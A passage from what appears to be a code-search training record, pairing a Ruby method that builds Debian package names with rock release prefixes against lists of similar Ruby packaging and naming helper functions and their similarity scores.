"def get_pname(resource)\n case resource\n when RDF::Node\n return options[:unique_bnodes] ? resource.to_unique_base : resource.to_base\n when RDF::URI\n uri = resource.to_s\n else\n return nil\n end\n\n #log_debug {\"get_pname(#{resource}), std?}\"}\n pname = case\n when @uri_to_pname.key?(uri)\n return @uri_to_pname[uri]\n when u = @uri_to_prefix.keys.detect {|u| uri.index(u.to_s) == 0}\n # Use a defined prefix\n prefix = @uri_to_prefix[u]\n unless u.to_s.empty?\n prefix(prefix, u) unless u.to_s.empty?\n #log_debug(\"get_pname\") {\"add prefix #{prefix.inspect} => #{u}\"}\n uri.sub(u.to_s, \"#{prefix}:\")\n end\n when @options[:standard_prefixes] && vocab = RDF::Vocabulary.each.to_a.detect {|v| uri.index(v.to_uri.to_s) == 0}\n prefix = vocab.__name__.to_s.split('::').last.downcase\n @uri_to_prefix[vocab.to_uri.to_s] = prefix\n prefix(prefix, vocab.to_uri) # Define for output\n #log_debug {\"get_pname: add standard prefix #{prefix.inspect} => #{vocab.to_uri}\"}\n uri.sub(vocab.to_uri.to_s, \"#{prefix}:\")\n else\n nil\n end\n\n # Make sure pname is a valid pname\n if pname\n md = PNAME_LN.match(pname) || PNAME_NS.match(pname)\n pname = nil unless md.to_s.length == pname.length\n end\n\n @uri_to_pname[uri] = pname\n end",
"def prefix\n 'oai_dc' \n end",
"def fully_qualified_wire_name\n return java_package\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{name}-#{version}\".dup.tap(&Gem::UNTAINT)\n else\n \"#{name}-#{version}-#{platform}\".dup.tap(&Gem::UNTAINT)\n end\n end",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def vendored_package_name(package)\n\tFile.join($package_name, 'vendor/src', package)\nend",
"def rings_project_name\n \"#{root_project_name}#{RINGS_PREFIX}\"\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil? then\n \"#{name}-#{version}\".untaint\n else\n \"#{name}-#{version}-#{platform}\".untaint\n end\n end",
"def platform_shortname\n if rhel?\n if \"rocky\" == Ohai[\"platform\"]\n \"rocky\"\n else\n \"el\"\n end\n elsif suse?\n \"sles\"\n else\n Ohai[\"platform\"]\n end\n end",
"def directory_name\n \n directory_name = ''\n if self.pcb_revision != ''\n directory_name = 'pcb' \n directory_name += self.pcb_prefix + '_' \n directory_name += self.pcb_number + '_'\n directory_name += self.pcb_dash_number + '_'\n directory_name += self.pcb_revision\n end\n \n return directory_name\n \n end",
"def fmri_package_name\n version = project.build_version.split(/[^\\d]/)[0..2].join(\".\")\n platform = Ohai[\"platform_version\"]\n \"#{safe_base_package_name}@#{version},#{platform}-#{project.build_iteration}\"\n end",
"def prefix_for(ns_uri)\n if namespaces_by_uri().has_key?(ns_uri)\n namespaces_by_uri()[ns_uri].prefix || \"\" # namespace.prefix returns nil if there is no prefix defined (default prefix)\n end\n end",
"def get_radiant_player_app_name()\n app_name = \"Radiant Player\"\n return app_name\nend",
"def native_dependency_name(name, selected_platform = nil)\n if !selected_platform\n selected_platform = @packager.target_platform\n end\n\n # Identify this rock release and its ancestors\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, selected_platform.architecture)\n\n if name.is_a? String\n # Check for 'plain' name, the 'unprefixed' name and for the 'release' name\n if this_rock_release.ancestorContains(name) ||\n selected_platform.contains(name)\n # direct name match always is an os dependency\n # it can never be in a rock release\n return [name, true]\n end\n\n # try debian naming scheme for ruby\n if this_rock_release.ancestorContains(\"ruby-#{Deb.canonize(name)}\") ||\n selected_platform.contains(\"ruby-#{Deb.canonize(name)}\")\n return [\"ruby-#{Deb.canonize(name)}\", true]\n end\n\n # otherwise, ask for the ancestor that contains a rock ruby\n # package\n ancestor_release_name = this_rock_release.releasedInAncestor(\n @packager.debian_ruby_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release_name.empty?\n return [@packager.debian_ruby_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_ruby_name(name, true), false]\n else\n # ask for the ancestor that contains a rock ruby\n # package\n ancestor_release = this_rock_release.releasedInAncestor(\n @packager.debian_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release.empty?\n return [@packager.debian_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_name(name, true), false]\n end\n end",
"def var_prefix\n # ugh, i was generating meta/qb.yml files that set 'var_prefix' to\n # `null`, but it would be nice to\n # \n meta_or 'var_prefix', namespaceless\n end",
"def generateBuildNamePrefix()\n testflight_version_number = get_version_number(\n xcodeproj: \"CICD-DemoApp.xcodeproj\"\n )\n testflight_build_number = get_build_number(\n xcodeproj: \"CICD-DemoApp.xcodeproj\"\n )\n return \"CICD_\" + testflight_version_number.to_s + \"-\" + testflight_build_number.to_s\nend",
"def platform_version_for_package\n if platform == 'rhel'\n platform_version[/([\\d]+)\\..+/, 1]\n else\n platform_version\n end\n end",
"def var; HOMEBREW_PREFIX+'var' end",
"def var; HOMEBREW_PREFIX+'var' end",
"def prefix\n (platform_family?('windows') ? 'C:/Chef/' : '/etc/chef/')\nend",
"def base_prefix\n HaridsyncHelpers.ensure_uppercase_dn_component(group['ou'] || DEFAULT_PREFIX)\n end",
"def install_root\n Pathname.new(ENV[\"PREFIX\"] || \"/var/www/ood/apps/sys\")\n end",
"def package_name(buildno=nil)\n if buildno\n buildno = Time.now.strftime(\"%H*60+%M\")\n versnum = \"#{version}.#{buildno}\"\n else\n versnum = version\n end\n\n if platform\n \"#{name}-#{versnum}-#{platform}\"\n else\n \"#{name}-#{versnum}\"\n end\n end",
"def original_name # :nodoc:\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{@name}-#{@version}\"\n else\n \"#{@name}-#{@version}-#{@original_platform}\"\n end\n end",
"def package_name\n ver = if new_resource.version == 'latest'\n package_metadata[:version]\n else\n new_resource.version\n end\n \"Chef Development Kit v#{ver}\"\n end",
"def get_pkg_name(candidate_tag=nil, distro=nil)\n prod_name = self.task.prod\n\n # FIXME: stop that hardcoding... one day!\n pkg_name = self.name\n\n distro = self.task.distros[0] if distro.nil?\n\n is_scl_package = MeadSchedulerService.is_scl_package?(prod_name, self.name)\n # different naming convention for different products\n if prod_name == \"eap6\" && distro == 'el7' && is_scl_package\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n\n # Only enable scl thing for RHEL distros, aka when distro = el_\n elsif is_scl_package && distro.match(/^el/)\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n end\n pkg_name\n end",
"def debian_meta_name(name, with_rock_release_prefix = true)\n if with_rock_release_prefix\n rock_release_prefix + \"meta-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"meta-\" + Deb.canonize(name)\n end\n end",
"def redis_prefix\n @redis_prefix ||= name.underscore\n end",
"def get_saltstack_package_full_name(package)\n # pillar = YAML.safe_load(File.read('test/salt/pillar/windows.sls'))\n url = 'https://raw.githubusercontent.com/saltstack/salt-winrepo-ng/master/'\n files = [package + '.sls', package + '/init.sls']\n # example: package = \"7zip\"=>{\"version\"=>\"18.06.00.0\", \"refresh_minion_env_path\"=>false}\n saltstack_package_full_name = files.find do |checkme|\n ps = \"$f = (((Get-ChildItem -Path $env:LOCALAPPDATA -Filter 'salt-winrepo-ng' -Recurse -Directory).Fullname[0]) + '\\\\#{checkme.sub('/', '\\\\')}'); if (Test-Path $f -PathType Leaf) {Get-Content -Path $f}\"\n begin\n file = (open(url + checkme) & :read)\n rescue\n begin\n file = (powershell(ps).stdout)\n rescue\n next\n end\n end\n unless file.nil? || file.empty?\n candidate = file.match(/full_name: '([\\S]+).*'/).captures[0]\n end\n break candidate unless candidate.nil?\n end\n Inspec::Log.debug('[get_saltstack_package_full_name] found candidate: ' + saltstack_package_full_name)\n saltstack_package_full_name\nend",
"def prefix\n nil\n end",
"def global_prefix\n self.class.global_prefix\n end",
"def package_name\n [self.config.organization, self.config.project_name].compact.collect(&:underscore).join('-')\n end",
"def prefix\n self.class.prefix\n end",
"def prefix(browser, version = nil)\n assert_valid_browser browser\n assert_valid_version browser, version if version\n data = browser_data(browser)\n p = if data[\"prefix_exceptions\"] && data[\"prefix_exceptions\"][version]\n data[\"prefix_exceptions\"][version]\n else\n data[\"prefix\"]\n end\n \"-#{p}\"\n end",
"def package_name\n # TODO: verify renamed packages\n resource['title']\n end",
"def debianize_name(name, build_type: :cmake, with_rock_release_prefix: true, release_name: rock_release_name)\n if build_type == :ruby\n if with_rock_release_prefix\n rock_release_prefix(release_name) + \"ruby-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"-ruby-\" + Deb.canonize(name)\n end\n else\n if with_rock_release_prefix\n rock_release_prefix(release_name) + Deb.canonize(name)\n else\n pkg_prefix_base + \"-\" + Deb.canonize(name)\n end\n end\n end",
"def prefix_dir_of(selection)\n if workspace_dir?(selection)\n ws.prefix_dir\n elsif find_package_set(selection)\n raise NoSuchDir, \"#{selection} is a package set, and package sets do not have prefixes\"\n else\n resolve_package(selection).prefix\n end\n end",
"def prefix\n fetch('university.prefix')\n end",
"def package_repository(package_name, desired_version, arch = nil)\n package(package_name, arch, true, false) do |pkg|\n return pkg.repoid if desired_version == pkg.version.to_s\n end\n\n nil\n end",
"def prefix\n raise NotImplementedError\n end",
"def version_number\n self.name =~ /RHEL-([0-9]+)/\n return $1.to_i\n end",
"def account_prefix\n current_account.account_prefix\n end",
"def prefix\n \"#{name}::\"\n end",
"def native_pkg_to_install_string(pkg)\n name = pkg[:metadata][:name]\n version = pkg[:metadata][:version]\n package_version = pkg[:metadata][:package_version]\n pkgname = \"#{name}-#{version}\"\n if package_version\n pkgname << \"-#{package_version}\"\n end\n pkgname\n end",
"def get_namespace(node, prefix); end",
"def fully_qualified_name\n return \".#{self.package}\"\n end",
"def repository_name\n @repository_name ||= \"#{project_name}-boshrelease\"\n end",
"def prefix\n fetch('superhero.prefix')\n end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def resource_id(prefix)\n if default_config?\n [prefix, project, node_type, node_name]\n else\n [prefix, project, configuration, node_type, node_name]\n end.compact.join(\"_\").tr(\"-\", '_').tr(\"/\", \"_\")\n end",
"def resource_id(prefix)\n if default_config?\n [prefix, project, node_type, node_name]\n else\n [prefix, project, configuration, node_type, node_name]\n end.compact.join(\"_\").tr(\"-\", '_').tr(\"/\", \"_\")\n end",
"def prefix\n ''\n end",
"def repo_name\n @repo_name ||= InchCI::ProjectUID.new(uid).repo_name\n end",
"def drop_prefix(repo)\n repo.split('-')[1].to_s.capitalize\nend",
"def gem_name\n \"#{@account}-#{@name}\"\n end",
"def default_platform_service_name(version: installed_postgresql_major_version, source: installed_postgresql_package_source)\n if platform_family?('rhel', 'fedora', 'amazon') && source.eql?(:repo)\n \"postgresql-#{version}\"\n else\n 'postgresql'\n end\n end",
"def generateBuildNamePrefix_Debug()\n prefix = generateBuildNamePrefix\n return prefix + \"-debug\"\nend",
"def repo_name(repo)\n name = nil\n case repo\n when 'stable'\n name = 'omnibus-stable-local'\n when 'current'\n name = 'omnibus-current-local'\n when nil # pass through\n else\n raise \"#{repo} not supported. must be current or stable\"\n end\n name\nend",
"def kafka_base\n %(kafka_#{node[:kafka][:scala_version]}-#{node[:kafka][:version]})\nend",
"def pkg_path\n \"pkg/#{spec.full_name}\"\n end",
"def current_package\n @current_package\n end",
"def prefix\n @data['prefix']\n end",
"def platform_name; non_framework_platforms.first; end",
"def prefixed(p)\n condition { env['enron.api.prefix'] == p }\n end",
"def version_pathname(splunk_home)\n Pathname.new(splunk_home).join('etc/splunk.version')\n end",
"def project_name\n DeliveryGolang::Helpers.project_name(node)\n end",
"def full_name\n \"#{@name}-#{@version}\"\n end",
"def prefix\n @obj['prefix']\n end",
"def prefix(num)\n namespace + '_prefix_' + num.to_s\n end",
"def version_prefix\n '/v2'\n end",
"def prefix_tag(tag)\n tag = Origen::VersionString.new(tag)\n if tag.semantic?\n tag.prefixed\n else\n tag\n end\n end",
"def name_prefix=(_arg0); end",
"def cli_prefix; end",
"def fully_qualified_ruby_name\n return \"::#{self.package.gsub('.', '::')}\"\n end",
"def get_fuseki_command_prefix(args)\n args[:path] ? \"cd #{args[:path]}; #{args[:path]}/\" : \"\"\n end",
"def get_ai_repo_version(options)\n options = get_ai_publisherurl(options)\n if options['test'] == true || options['host-os-name'].to_s.match(/Darwin/)\n version = \"0.175.1\"\n else\n message = \"Information:\\tDetermining if available repository version from \"+options['publisherurl']\n command = \"pkg info -g #{options['publisherurl']} entire |grep Branch |awk \\\"{print \\\\\\$2}\\\"\"\n version = execute_command(options,message,command)\n version = version.chomp\n version = version.split(/\\./)[0..2].join(\".\")\n end\n return version\nend",
"def relative_working_dir\n invoke(:rev_parse, '--show-prefix')\n end"
] | [
"0.7867165",
"0.66621006",
"0.6451794",
"0.64171606",
"0.6342943",
"0.6251559",
"0.62242717",
"0.620227",
"0.61056644",
"0.6062629",
"0.60344064",
"0.6009978",
"0.5993054",
"0.5879808",
"0.5875949",
"0.5858529",
"0.58561265",
"0.58542913",
"0.5852562",
"0.5847498",
"0.58407396",
"0.5837573",
"0.582394",
"0.581892",
"0.57747805",
"0.57630014",
"0.57600987",
"0.5757714",
"0.5757189",
"0.5748886",
"0.57485986",
"0.5746597",
"0.5746597",
"0.57423913",
"0.57418996",
"0.56979007",
"0.5687432",
"0.5678601",
"0.56784475",
"0.5676627",
"0.5674014",
"0.5621278",
"0.56192124",
"0.5612504",
"0.5610792",
"0.5600917",
"0.5590607",
"0.5581227",
"0.55787516",
"0.55716956",
"0.5569686",
"0.55627304",
"0.55463004",
"0.5535694",
"0.553177",
"0.55294156",
"0.55134726",
"0.5511342",
"0.5486464",
"0.54712147",
"0.54634976",
"0.54568833",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.54551816",
"0.5453332",
"0.5453332",
"0.5452936",
"0.5452333",
"0.5444958",
"0.5444608",
"0.54306424",
"0.5425343",
"0.54218477",
"0.5412991",
"0.5406126",
"0.5398231",
"0.5393852",
"0.5391214",
"0.5390703",
"0.5387568",
"0.5376974",
"0.53710926",
"0.5369542",
"0.5367661",
"0.5359313",
"0.53546923",
"0.5349675",
"0.53459215",
"0.53369474",
"0.5328167",
"0.531456",
"0.53131795"
] | 0.76407176 | 1 |
The debian name of a package either rock[] or for ruby packages rock[]ruby and the releasename can be avoided by setting with_rock_release_prefix to false | def debian_name(pkginfo, with_rock_release_prefix = true, release_name = nil)
if pkginfo.kind_of?(String)
raise ArgumentError, "method debian_name expects a PackageInfo as argument, got: #{pkginfo.class} '#{pkginfo}'"
end
name = pkginfo.name
debianize_name(name,
build_type: pkginfo.build_type,
with_rock_release_prefix: with_rock_release_prefix,
release_name: release_name)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def debian_ruby_name(name, with_rock_release_prefix = true, release_name = nil)\n if with_rock_release_prefix\n rock_ruby_release_prefix(release_name) + Deb.canonize(name)\n else\n \"ruby-\" + Deb.canonize(name)\n end\n end",
"def debianize_name(name, build_type: :cmake, with_rock_release_prefix: true, release_name: rock_release_name)\n if build_type == :ruby\n if with_rock_release_prefix\n rock_release_prefix(release_name) + \"ruby-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"-ruby-\" + Deb.canonize(name)\n end\n else\n if with_rock_release_prefix\n rock_release_prefix(release_name) + Deb.canonize(name)\n else\n pkg_prefix_base + \"-\" + Deb.canonize(name)\n end\n end\n end",
"def debian_meta_name(name, with_rock_release_prefix = true)\n if with_rock_release_prefix\n rock_release_prefix + \"meta-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"meta-\" + Deb.canonize(name)\n end\n end",
"def native_dependency_name(name, selected_platform = nil)\n if !selected_platform\n selected_platform = @packager.target_platform\n end\n\n # Identify this rock release and its ancestors\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, selected_platform.architecture)\n\n if name.is_a? String\n # Check for 'plain' name, the 'unprefixed' name and for the 'release' name\n if this_rock_release.ancestorContains(name) ||\n selected_platform.contains(name)\n # direct name match always is an os dependency\n # it can never be in a rock release\n return [name, true]\n end\n\n # try debian naming scheme for ruby\n if this_rock_release.ancestorContains(\"ruby-#{Deb.canonize(name)}\") ||\n selected_platform.contains(\"ruby-#{Deb.canonize(name)}\")\n return [\"ruby-#{Deb.canonize(name)}\", true]\n end\n\n # otherwise, ask for the ancestor that contains a rock ruby\n # package\n ancestor_release_name = this_rock_release.releasedInAncestor(\n @packager.debian_ruby_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release_name.empty?\n return [@packager.debian_ruby_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_ruby_name(name, true), false]\n else\n # ask for the ancestor that contains a rock ruby\n # package\n ancestor_release = this_rock_release.releasedInAncestor(\n @packager.debian_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release.empty?\n return [@packager.debian_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_name(name, true), false]\n end\n end",
"def rock_release_prefix(release_name = nil)\n release_name ||= rock_release_name\n if release_name\n pkg_prefix_base + \"-#{release_name}-\"\n else\n pkg_prefix_base + \"-\"\n end\n end",
"def rock_ruby_release_prefix(release_name = nil)\n rock_release_prefix(release_name) + \"ruby-\"\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def package_name\n @version ? \"#{@name}-#{@version}\" : @name\n end",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def hadoop_package(name)\n return name unless hdp22?\n return name if node['platform_family'] == 'debian'\n fw = name.split('-').first\n pv = hdp_version.tr('.', '_').tr('-', '_')\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def package_filename\n \"#{@package.name}_#{@package.version}_#{@package.architecture}.deb\"\n end",
"def package_name\n # TODO: verify renamed packages\n resource['title']\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def hadoop_package(name)\n return name unless hdp22? || iop?\n return name if node['platform_family'] == 'debian'\n fw =\n if name == 'spark-core'\n name\n else\n name.split('-').first\n end\n pv =\n if hdp22?\n hdp_version.tr('.', '_').tr('-', '_')\n else\n node['hadoop']['distribution_version'].tr('.', '_')\n end\n nn = \"#{fw}_#{pv}\"\n name.gsub(fw, nn)\n end",
"def package_name\n ver = if new_resource.version == 'latest'\n package_metadata[:version]\n else\n new_resource.version\n end\n \"Chef Development Kit v#{ver}\"\n end",
"def package_name(buildno=nil)\n if buildno\n buildno = Time.now.strftime(\"%H*60+%M\")\n versnum = \"#{version}.#{buildno}\"\n else\n versnum = version\n end\n\n if platform\n \"#{name}-#{versnum}-#{platform}\"\n else\n \"#{name}-#{versnum}\"\n end\n end",
"def package_name\n [self.config.organization, self.config.project_name].compact.collect(&:underscore).join('-')\n end",
"def fix_name(name)\n if name.start_with?(\"python\")\n # If the python package is called \"python-foo\" strip the \"python-\" part while\n # prepending the package name prefix.\n return [attributes[:python_package_name_prefix], name.gsub(/^python-/, \"\")].join(\"-\")\n else\n return [attributes[:python_package_name_prefix], name].join(\"-\")\n end\n end",
"def vendored_package_name(package)\n\tFile.join($package_name, 'vendor/src', package)\nend",
"def package_name\n if supports_ports?\n if makefile_variable_value(\"PKGNAME\", port_path) =~ /^(.+)-[^-]+$/\n $1\n else\n raise Chef::Exceptions::Package, \"Unexpected form for PKGNAME variable in #{port_path}/Makefile\"\n end\n else\n new_resource.package_name\n end\n end",
"def get_pkg_name(candidate_tag=nil, distro=nil)\n prod_name = self.task.prod\n\n # FIXME: stop that hardcoding... one day!\n pkg_name = self.name\n\n distro = self.task.distros[0] if distro.nil?\n\n is_scl_package = MeadSchedulerService.is_scl_package?(prod_name, self.name)\n # different naming convention for different products\n if prod_name == \"eap6\" && distro == 'el7' && is_scl_package\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n\n # Only enable scl thing for RHEL distros, aka when distro = el_\n elsif is_scl_package && distro.match(/^el/)\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n end\n pkg_name\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil? then\n \"#{name}-#{version}\".untaint\n else\n \"#{name}-#{version}-#{platform}\".untaint\n end\n end",
"def set_dpkg_package_name(name)\n dpkg_package.name name\n dpkg_package.package_name name\n end",
"def package_name\n raise NotImplementedError\n end",
"def package_name\n raise Puppet::Error, 'luet requires packages have a category set' unless @resource[:category]\n\n \"#{@resource[:category]}/#{@resource[:name]}\"\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{name}-#{version}\".dup.tap(&Gem::UNTAINT)\n else\n \"#{name}-#{version}-#{platform}\".dup.tap(&Gem::UNTAINT)\n end\n end",
"def original_name # :nodoc:\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{@name}-#{@version}\"\n else\n \"#{@name}-#{@version}-#{@original_platform}\"\n end\n end",
"def fmri_package_name\n version = project.build_version.split(/[^\\d]/)[0..2].join(\".\")\n platform = Ohai[\"platform_version\"]\n \"#{safe_base_package_name}@#{version},#{platform}-#{project.build_iteration}\"\n end",
"def safe_base_package_name\n if project.package_name =~ /\\A[a-z0-9\\.\\+\\-]+\\z/\n project.package_name.dup\n else\n converted = project.package_name.downcase.gsub(/[^a-z0-9\\.\\+\\-]+/, \"-\")\n\n log.warn(log_key) do\n \"The `name' component of IPS package names can only include \" \\\n \"lowercase alphabetical characters (a-z), numbers (0-9), dots (.), \" \\\n \"plus signs (+), and dashes (-). Converting `#{project.package_name}' to \" \\\n \"`#{converted}'.\"\n end\n converted\n end\n end",
"def filtered_dependencies(pkginfo, with_rock_release_prefix = true)\n target_platform = @packager.target_platform\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, target_platform.architecture)\n\n deps_rock_pkginfos = pkginfo.dependencies[:rock_pkginfo].dup\n deps_osdeps_packages = pkginfo.dependencies[:osdeps].dup\n non_native_dependencies = pkginfo.dependencies[:nonnative].dup\n\n if target_platform.distribution_release_name\n # CASTXML vs. GCCXML in typelib\n if pkginfo.name =~ /typelib$/\n # add/remove the optional dependencies on the\n # rock-package depending on the target platform\n # there are typelib versions with and without the\n # optional depends. we know which platform requires\n # a particular dependency.\n deps_rock_pkginfos.delete_if do |pkginfo|\n pkginfo.name == \"castxml\" || pkginfo.name == \"gccxml\"\n end\n\n if target_platform.contains(\"castxml\")\n deps_osdeps_packages.push(\"castxml\")\n elsif target_platform.contains(\"gccxml\")\n #todo: these need to checked on the other platforms\n deps_osdeps_packages.push(\"gccxml\")\n else\n raise ArgumentError, \"TargetPlatform: #{target_platform} does neither support castxml nor gccml - cannot build typelib\"\n end\n end\n\n # Filter out optional packages, e.g. llvm and clang for all platforms where not explicitly available\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_optional.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n result = target_platform.contains(name)\n end\n end\n result\n end\n\n # Filter out excluded packages, e.g. libqwt5-qt4-dev\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n result = true\n Packaging::Config.packages_excluded.each do |pkg_name|\n regex = Regexp.new(pkg_name)\n if regex.match(name)\n Packager.info \"#{pkginfo.name} excluding osdeps #{pkg_name} as dependency\"\n result = false\n end\n end\n result\n end\n\n # Filter ruby versions out -- we assume chroot has installed all\n # ruby versions\n #\n # This is a workaround, since the information about required packages\n # comes from the build server platform and might not correspond\n # with the target platform\n #\n # Right approach: bootstrap within chroot and generate source packages\n # in the chroot\n #deps_osdeps_packages = deps[:osdeps].select do |name|\n deps_osdeps_packages = deps_osdeps_packages.select do |name|\n name !~ /^ruby[0-9][0-9.]*/\n end\n\n # Prefer package of the OS for gems if they are available there\n #deps_nonnative_packages = deps[:nonnative].map do |name, version|\n non_native_dependencies = non_native_dependencies.map do |name, version|\n dep_name,is_osdep = native_dependency_name(name)\n # if with_rock_release_prefix is given all packages 'have to be'\n # os dependencies, otherwise it triggers further resolution of nonnative packages\n # which cannot exist (in resolve_all)\n if is_osdep || with_rock_release_prefix\n deps_osdeps_packages << dep_name\n nil\n else\n name\n end\n end.compact\n end\n\n deps_rock_packages = deps_rock_pkginfos.map do |pkginfo|\n debian_name = @packager.debian_name(pkginfo, with_rock_release_prefix)\n this_rock_release.packageReleaseName(debian_name)\n end.sort\n\n Packager.info \"'#{pkginfo.name}' with (available) rock package dependencies: '#{deps_rock_packages}'\"\n Packager.info \"'#{pkginfo.name}' with (available) osdeps dependencies: '#{deps_osdeps_packages}'\"\n\n # Return rock packages, osdeps and non native deps (here gems)\n {:rock => deps_rock_packages, :osdeps => deps_osdeps_packages, :nonnative => non_native_dependencies }\n end",
"def reprepro_has_package?(debian_pkg_name, release_name, codename, arch)\n @reprepro_lock.lock\n\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n cmd = \"#{reprepro_bin} -A #{arch} -T deb -V -b #{reprepro_dir} list #{codename} #{debian_pkg_name}\"\n package_info = `#{cmd}`\n if !package_info.empty?\n Packager.info \"Reprepro: #{debian_pkg_name} available for #{codename} #{arch}\"\n return true\n else\n Packager.info \"Reprepro: #{debian_pkg_name} not available for #{codename} #{arch}\"\n return false\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def package_from_name\n case name.downcase\n when 'splunk' then package :splunk\n when 'universal_forwarder' then package :universal_forwarder\n else raise 'Package must be specified (:splunk or :universal_forwarder)'\n end\n end",
"def is_deb?\n return !!@name.match(/^(debian|ubuntu|cumulus|huaweios)-.*$/)\n end",
"def full_name\n \"#{@package}.#{parameterized_name}\"\n end",
"def built_rpm_names(build)\n build.\n # Just names from the rpms without nvr info\n brew_rpms.map(&:name_nonvr).\n # Remove any duplicates\n uniq.\n # Filter out any debuginfo names\n reject{ |name| name =~ /debuginfo/ }.\n # Remove prefixes if there are any for this product. (Mainly for SCL, see Bug 1003719)\n map { |name| BrewRpmNamePrefix.strip_using_list_of_prefixes(@errata.product.brew_rpm_name_prefixes, name) }\n end",
"def package_repository(package_name, desired_version, arch = nil)\n package(package_name, arch, true, false) do |pkg|\n return pkg.repoid if desired_version == pkg.version.to_s\n end\n\n nil\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def package_name(val = NULL_ARG)\n @package_name = val unless val.equal?(NULL_ARG)\n @package_name.nil? ? @name : @package_name\n end",
"def apt_packages\n PRE_INSTALLED_OS_PACKAGES[@app.release].join(\" #{NL_TAB}\")\n end",
"def default_container_name\n full_release_name.gsub('_', '-')\n end",
"def release_name\n return nil unless @data['name'] && @data['version']\n [ dashed_name, @data['version'] ].join('-')\n end",
"def default_dev_package\n # Check for an override.\n return dev_package_overrides[package_name] if dev_package_overrides.include?(package_name)\n suffix = node.value_for_platform_family(debian: '-dev', rhel: '-devel', fedora: '-devel')\n # Platforms like Arch and Gentoo don't need this anyway. I've got no\n # clue how Amazon Linux does this.\n if suffix\n package_name + suffix\n else\n nil\n end\n end",
"def package_name(val = NULL)\n if null?(val)\n @package_name || name\n else\n @package_name = val\n end\n end",
"def package_basename(extension='.gem')\n [ package_name, version ].join('-') + extension\n end",
"def prefixed_label(package)\n label = ( package =~ /^#{$prefix}(.*)$/ ) && $1 || package\n label = '.' if label.empty?\n label\nend",
"def version_file_from( name )\n\t\treturn name.\n\t\t\tsplit( /-/ ).\n\t\t\treject {|word| PACKAGE_IGNORE_WORDS.include?(word) }.\n\t\t\tjoin( '/' )\n\tend",
